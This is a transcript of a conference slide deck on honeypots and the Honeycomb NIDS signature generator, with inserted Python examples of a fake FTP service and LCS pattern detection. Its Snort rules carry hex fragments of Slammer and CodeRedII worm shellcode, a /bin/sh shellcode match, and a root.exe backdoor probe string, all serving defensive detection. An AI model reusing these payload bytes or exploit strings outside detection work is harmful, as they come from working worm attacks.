
Number of slides: 31
Honeycomb and the current state of Honeypot Technology
Christian Kreibich <christian.[email protected]cam.ac.uk>

Coming up...
- Introduction to Honeypots
- Current state of the art: Honeynets
- Honeycomb: automated NIDS signature creation
- Three days in the life of an unprotected cable modem connection
So what's a Honeypot?
- "A Honeypot is a computer resource set up for the purpose of monitoring and logging the activities of entities that probe, attack or compromise it." (My attempt on [email protected])
- No production value, so it should see no traffic.
- Any interaction with these systems is therefore likely malicious.
- Flexible concept, not a fixed tool.
- Not new: The Cuckoo's Egg, An Evening with Berferd

Types of Honeypots
- Low interaction:
  - Trap files, database entries etc. ("Honeytokens")
  - Emulated services and operating systems
  - Easier to deploy, limited capabilities.
- High interaction:
  - Runs real systems
  - Need to limit the harm that can be done
  - More to learn, more complexity, more risk!
Low interaction: fake services
- From a fake FTP server shell script (canned wu-ftpd-style replies, one case arm per command):

    case $command in
      QUIT* )
        echo -e "221 Goodbye.\r"
        exit 0
        ;;
      SYST* )
        echo -e "215 UNIX Type: L8\r"
        ;;
      HELP* )
        echo -e "214-The following commands are recognized (* =>'s unimplemented).\r"
        echo -e "   USER    PORT    STOR    MSAM*   RNTO    NLST    MKD     CDUP\r"
        echo -e "   PASS    PASV    APPE    MRSQ*   ABOR    SITE    XMKD    XCUP\r"
        echo -e "   ACCT*   TYPE    MLFL*   MRCP*   DELE    SYST    RMD     STOU\r"
        echo -e "   SMNT*   STRU    MAIL*   ALLO    CWD     STAT    XRMD    SIZE\r"
        echo -e "   REIN*   MODE    MSND*   REST    XCWD    HELP    PWD     MDTM\r"
        echo -e "   QUIT    RETR    MSOM*   RNFR    LIST    NOOP    XPWD\r"
        echo -e "214 Direct comments to [email protected]$domain.\r"
        ;;
    esac
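The same fake-service idea as a small, testable state machine. This is an added example, not honeyd's script and not code from the slides: the login trap (every USER/PASS pair is accepted and logged, data-channel commands fail the way a broken server would) is the point of a low-interaction pot, and the hostname, banner and log layout below are our own choices.

```python
"""Added example (not honeyd's script): a fake FTP control channel as a
pure function, so the login trap can be driven and checked offline.
Reply texts mimic wu-ftpd; banner, hostname and log layout are constructed."""

GREETING = "220 ftp.example.net FTP server (Version wu-2.6.2) ready.\r\n"  # constructed banner

HELP_TEXT = (
    "214-The following commands are recognized (* =>'s unimplemented).\r\n"
    "   USER    PORT    STOR    MSAM*   RNTO    NLST    MKD     CDUP\r\n"
    "   PASS    PASV    APPE    MRSQ*   ABOR    SITE    XMKD    XCUP\r\n"
    "   QUIT    RETR    MSOM*   RNFR    LIST    NOOP    XPWD\r\n"
    "214 Direct comments to ftp-bugs@ftp.example.net.\r\n"   # constructed address
)

# Commands that would need a data connection. We emulate none, so they fail
# like a misconfigured server would, which still keeps the attacker talking.
DATA_COMMANDS = {"LIST", "NLST", "RETR", "STOR", "APPE", "PORT", "PASV"}


def new_session() -> dict:
    """Per-connection state: claimed user, whether they 'logged in', and every
    command line seen. That log is the honeypot's product."""
    return {"user": None, "authed": False, "log": []}


def ftp_response(state: dict, line: str) -> str:
    """Reply for one received command line; updates state in place."""
    cmd, _, arg = line.rstrip("\r\n").partition(" ")
    cmd = cmd.upper()
    state["log"].append((cmd, arg))          # raw command, password included
    if cmd == "USER":
        state["user"] = arg
        state["authed"] = False
        return f"331 Password required for {arg}.\r\n"
    if cmd == "PASS":
        if state["user"] is None:
            return "503 Login with USER first.\r\n"
        state["authed"] = True               # any password works: we observe, we do not protect
        return f"230 User {state['user']} logged in.\r\n"
    if cmd == "SYST":
        return "215 UNIX Type: L8\r\n"
    if cmd == "HELP":
        return HELP_TEXT
    if cmd == "QUIT":
        return "221 Goodbye.\r\n"
    if not state["authed"]:
        return "530 Please login with USER and PASS.\r\n"
    if cmd in ("PWD", "XPWD"):
        return '257 "/" is current directory.\r\n'
    if cmd == "NOOP":
        return "200 NOOP command successful.\r\n"
    if cmd in DATA_COMMANDS:
        return "425 Can't build data connection: Connection refused.\r\n"
    return f"500 '{cmd}': command not understood.\r\n"


def serve(lines):
    """Drive one session over already-received lines; returns (replies, log)."""
    state = new_session()
    replies = [GREETING] + [ftp_response(state, ln) for ln in lines]
    return replies, state["log"]


if __name__ == "__main__":
    # Constructed probe: the kind of session a scanner or a bored attacker produces.
    replies, log = serve(["USER anonymous", "PASS guest@", "SYST", "RETR /etc/passwd", "QUIT"])
    print("".join(replies))
    print(log)
```

Wiring `ftp_response` to a socket (or to honeyd's stdin/stdout script interface) is all that is left; keeping the protocol logic socket-free is what makes the trap testable.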
High interaction: Honeynets
- Gen II Honeynet (diagram: Internet, Honeywall, Honeypots, with the Production Network alongside)
- Honeywall:
  - Layer 2 bridge
  - IDS Gateway: iptables, snort_inline
  - Control & Report interface
snort_inline
- Drop the attack outright:

    drop tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A+; content:"|CD 80 E8 D7 FF FF FF|/bin/sh";)

- Or let it through, rewritten in flight:

    alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A+; content:"|CD 80 E8 D7 FF FF FF|/bin/sh"; replace:"|00 00 E8 D7 FF FF FF|/ben/sh";)

- The replacement has the same length as the match, so only the checksum changes: the int 0x80 syscall (CD 80) is overwritten and /bin/sh becomes /ben/sh, so the shellcode fails while the attacker still sees a connection that was not dropped.
High interaction: Honeynets
- Gen II Honeynet: Sebek 2
  - Surveillance "rootkit"
  - Kernel module
  - Captures all activity on the pots
  - Sends details to the Honeywall
  - Prevents sniffing of its own traffic
  - Sebeksniff
Honey Inspector
Honeycomb
- Goal: automated generation of NIDS signatures
- Name? Nice double meaning...
- Combing for patterns in Honeypot traffic
Honeycomb’s Architecture
Honeycomb’s Algorithm
Pattern Detection (I)
- Stream reassembly (diagram)
Pattern Detection (II)
- Longest common substring (LCS) on pairs of messages:
    fetaramasalatapatata
    insalataramoussaka
  (the LCS here is "salata")
- Can be done in O(|m1| + |m2|) using suffix trees
- Implemented libstree, a generic suffix tree library
- No hardcoding of protocol-specific knowledge
Pattern Detection (III)
- Horizontal detection:
  - LCS on pairs of messages
  - each message treated independently
  - e.g. (persistent) HTTP

Pattern Detection (IV)
- Vertical detection:
  - concatenates incoming messages
  - LCS on pairs of the concatenated strings
  - for interactive flows, and to mask TCP segmentation dynamics
  - e.g. FTP, Telnet, ...

Signature Pool
- Limited-size queue of current signatures
- Relational operators on signatures:
  - sig1 = sig2: all elements equal
  - sig1 ⊂ sig2: sig1 contains a subset of sig2's facts
  - signew = sigpool: signew ignored
  - signew ⊂ sigpool: signew added
  - sigpool ⊂ signew: signew augments sigpool
- Signature correlation on destination ports
- Avoids duplicates for trivial flows (portscan!)
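The detection pipeline from the last four slides (pairwise LCS, horizontal and vertical matching, destination-port correlation, and the signature pool with its equal/subset relations), run end to end on constructed traffic. This is an added example, not Honeycomb's code: `lcs` is a plain dynamic-programming LCS standing in for the suffix-tree implementation (same result, quadratic instead of linear cost), the subset relation on content facts is our reading of the slide, `min_len` is our own threshold against trivial matches, and the sample flows are invented. `snort_content` renders patterns the way the rules on the later slides look, except that Snort's own special characters are emitted as hex (the Code Red II rule below shows a 0x7C byte printed as a bare `||`, which Snort will not parse as intended).

```python
"""Added example (not Honeycomb's code): LCS pattern detection, horizontal and
vertical, with port correlation and a signature pool, on constructed flows."""
from collections import deque
from dataclasses import dataclass
from itertools import combinations


def lcs(a: bytes, b: bytes) -> bytes:
    """Longest common substring, O(|a|*|b|) DP (libstree: O(|a|+|b|), same answer)."""
    best_len = best_end = 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                if cur[j] > best_len:
                    best_len, best_end = cur[j], i
        prev = cur
    return a[best_end - best_len:best_end]


def snort_content(pattern: bytes) -> str:
    """Printable ASCII literally, all other bytes (and Snort's | " ; \\) as |XX XX| runs."""
    out, run = [], []

    def flush():
        if run:
            out.append("|" + " ".join(f"{x:02X}" for x in run) + "|")
            run.clear()

    for x in pattern:
        if 0x20 <= x < 0x7F and chr(x) not in '|";\\':
            flush()
            out.append(chr(x))
        else:
            run.append(x)
    flush()
    return "".join(out)


@dataclass(frozen=True)
class Signature:
    proto: str
    dport: int
    content: bytes

    def covers(self, other: "Signature") -> bool:
        """other ⊂ self: a content fact is implied by any longer content containing it."""
        return (self.proto == other.proto and self.dport == other.dport
                and other.content in self.content)

    def rule(self, dst: str = "any") -> str:
        return (f'alert {self.proto} any -> {dst} {self.dport} '
                f'(msg:"Honeycomb"; content:"{snort_content(self.content)}";)')


class SignaturePool:
    """Limited-size queue of current signatures."""

    def __init__(self, maxlen: int = 8):
        self.sigs = deque(maxlen=maxlen)

    def offer(self, new: Signature) -> str:
        for i, old in enumerate(self.sigs):
            if old == new:
                return "ignored"        # signew = sigpool
            if new.covers(old):
                self.sigs[i] = new      # sigpool ⊂ signew: signew augments it
                return "augmented"
        self.sigs.append(new)           # otherwise (incl. signew ⊂ sigpool): added
        return "added"


def detect(pool, proto, dport, flows, min_len=8):
    """flows: one list of inbound messages per connection, all to dport, so
    only flows to the same destination port are ever paired.
    Horizontal: message i of flow A against message i of flow B.
    Vertical: the two concatenated flows against each other."""
    for fa, fb in combinations(flows, 2):
        found = [lcs(ma, mb) for ma, mb in zip(fa, fb)]        # horizontal
        found.append(lcs(b"".join(fa), b"".join(fb)))          # vertical
        for pat in found:
            if len(pat) >= min_len:                            # min_len: our threshold
                pool.offer(Signature(proto, dport, pat))


def demo():
    """Constructed traffic: three worm-like requests differing in HTTP version
    and Host, and two Telnet logins typed a fragment at a time, where only
    vertical detection finds the shared 'root\\r\\n'."""
    pool = SignaturePool()
    http = [[b"GET /scripts/root.exe?/c+dir HTTP/1.1\r\nHost: x\r\n\r\n"],
            [b"GET /scripts/root.exe?/c+dir HTTP/1.0\r\nHost: www\r\n\r\n"],
            [b"GET /scripts/root.exe?/c+dir HTTP/1.0\r\nHost: 10.0.0.2\r\n\r\n"]]
    telnet = [[b"r", b"oo", b"t\r\n", b"pass"],
              [b"ro", b"ot\r\n", b"toor"]]
    detect(pool, "tcp", 80, http)
    detect(pool, "tcp", 23, telnet, min_len=4)
    return [s.rule("192.168.169.2/32") for s in pool.sigs]
```

Running `demo()` exercises all three pool outcomes: the first HTTP pair yields a 36-byte pattern (added), the second the same pattern (ignored), the third a 45-byte pattern that contains it (augmented, replacing the shorter one), and the Telnet pair contributes `root|0D 0A|` from vertical detection only, since no horizontal message pair shares more than one byte.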
Results
- We ran Honeycomb on an unfiltered cable modem connection
- Honeyd setup: fake FTP, Telnet, SMTP and Apache services, all Perl/shell scripts.
- Three-day period
- Some statistics:
  - 649 TCP connections, 123 UDP connections
  - 143 pings, almost exclusively UDP port 137 (NetBIOS)
  - Full traffic volume: ~1 MB
  - No wide-range portscanning

TCP Connections (chart): HTTP; Kuang2 Virus/Trojan; NetBIOS - W32/Deluder Worm; NetBIOS - open shares; Microsoft SQL Server

UDP Connections (chart): NetBIOS Nameservice; Messenger Service; Slammer
Signatures created: Slammer
- 1434/UDP worm, Microsoft SQL Server buffer overflow
- Honeyd log (start/end line per connection, 376-byte payloads):

    2003-05-08-02:26:43.0385 udp(17) S 81.89.64.111 2943 192.168.169.2 1434
    2003-05-08-02:27:43.0404 udp(17) E 81.89.64.111 2943 192.168.169.2 1434: 376 0
    2003-05-08-09:58:38.0807 udp(17) S 216.164.19.162 1639 192.168.169.2 1434
    2003-05-08-09:59:38.0813 udp(17) E 216.164.19.162 1639 192.168.169.2 1434: 376 0
    2003-05-08-17:15:24.0072 udp(17) S 66.28.200.226 6745 192.168.169.2 1434
    2003-05-08-17:16:24.0083 udp(17) E 66.28.200.226 6745 192.168.169.2 1434: 376 0

- Signature:

    alert udp any -> 192.168.169.2/32 1434 (msg:"Honeycomb Thu May 8 09h58m38 2003"; content:"|04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0|B|EB 0E 01 01|p|AE|B|90 90 90|h|DC C9 B0|B|B8 01 01|1|C9 B1 18|P|E2 FD|5|01 01 01 05|P|89 E5|Qh.dllhel32hkernQhounthickChGetTf|B9|llQh32.dhws2_f|B9|etQhsockf|B9|toQhsend|BE 18 10 AE|B|8D|E|D4|P|FF 16|P|8D|E|E0|P|8D|E|F0|P|FF 16|P|BE 10 10 AE|B|8B 1E 8B 03|=U|8B EC|Qt|05 BE 1C 10 AE|B|FF 16 FF D0|1|C9|QQP|81 F1 03 01 04 9B 81 F1 01 01|Q|8D|E|CC|P|8B|E|C0|P|FF 16|j|11|j|02 FF D0|P|8D|E|C4|P|8B|E|C0|P|FF 16 89 C6 09 DB 81 F3|
Signatures created: CodeRedII
- 80/TCP worm, Microsoft IIS buffer overflow
- Hit more than a dozen times

    alert tcp 80.0/8 any -> 192.168.169.2/32 80 (msg:"Honeycomb Tue May 6 11h55m20 2003"; flags:A; flow:established; content:"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0|0D 0A|Content-type: text/xml|0A|Content-length: 3379 |0D 0A C8 01 00|`|E8 03 00 00 00 CC EB FE|dg|FF|6|00 00|dg|89|&|00 00 E8 DF 02 00 00|h|04 01 00 00 8D 85||FE FF FF|P|FF|U|9C 8D 85||FE FF FF|P|FF|U|98 8B|@|10 8B 08 89 8D|X|FE FF FF FF|U|E4|=|04 04 00 00 0F 94 C1|=|04 08 00 00 0F 94 C5 0A CD 0F B6 C9 89 8D|T|FE FF FF 8B|u|08 81|~0|9A 02 00 00 0F 84 C4 00 00 00 C7|F0|9A 02 00 00 E8 0A 00 00 00|CodeRedII|00 8B 1C|$|FF|U|D8|f|0B C0 0F 95 85|8|FE FF FF C7 85|P|FE FF FF 01 00 00 00|j|00 8D 85|P|FE FF FF|P|8D 85|8|FE FF FF|P|8B|E|08 FF|p|08 FF 90 84 00 00 00 80 BD|8|FE FF FF 01|thS|FF|U|D4 FF|U|EC 01|E|84|i|BD|T|FE FF FF|,|01 00 00 81 C7|,|01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 89|F4|8D|E|88|Pj|00 FF|u|08 E8 05 00 00 00 E9 01 FF FF FF|j|00 FF|U|F0|P|FF|U|D0|Ou|D2 E8|;|05 00 00|i|BD|T|FE FF FF 00|&|05 81 C7 00|&|05|W|FF|U|E8|j|00|j|16 FF|U|8C|j|FF FF|U|E8 EB F9 8B|F4)E|84|jd|FF|U|E8 8D 85|<|FE FF FF|P|FF|U|C0 0F B7 85|<|FE FF FF|=|88 88 00 00|s|CF 0F B7 85|>|FE FF FF 83 F8 0A|s|C3|f|C7 85|p|FF FF FF 02 00|f|C7 85|r|FF FF …

- The full worm body is captured, thanks to vertical detection: the server replies before all packets have been seen, so horizontal matching alone would stop at the first message.
Signatures detected: others...
- A SYN-only pattern across the usual proxy ports, i.e. a proxy scanner:

    alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg:"Honeycomb Mon May 5 19h04m12 2003"; flags:S; flow:stateless;)

- Lookup: 2.104.201.64.in-addr.arpa domain name pointer for.information.see.proxyprotector.com
- Messenger Service spam:

    alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg:"Honeycomb Thu May 8 12h57m51 2003"; content:"|15 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO... www.Now4U2.co.uk";)

- 135/UDP lets you pop up spam^H^H^H^H Internet Advertisements on other Windows machines via the Messenger Service
- A Nimda-style probe for the root.exe backdoor left by earlier IIS worms:

    alert tcp 80.4.218.53/32 any -> 192.168.169.2/32 80 (msg:"Honeycomb Thu May 8 07h27m33 2003"; flags:PA; flow:established; content:"GET /scripts/root.exe?/c+dir HTTP/1.0|0D 0A|Host: www|0D 0A|Connnection: close|0D 0A 0D|";)
Summary
- System detects patterns in network traffic
- Good at worm detection, as long as the worm is not polymorphic!
- Approach still simplistic; approximate matching?
- TODO list:
  - Reasonable setup
  - Performance evaluation
  - Better signature reporting scheme
  - Log processing suite
  - Closer integration with honeyd

Thanks!
- Shoutouts: a13xhØ && 1ance
- No machines were harmed or compromised in the making of this presentation.
- [email protected]
- Questions?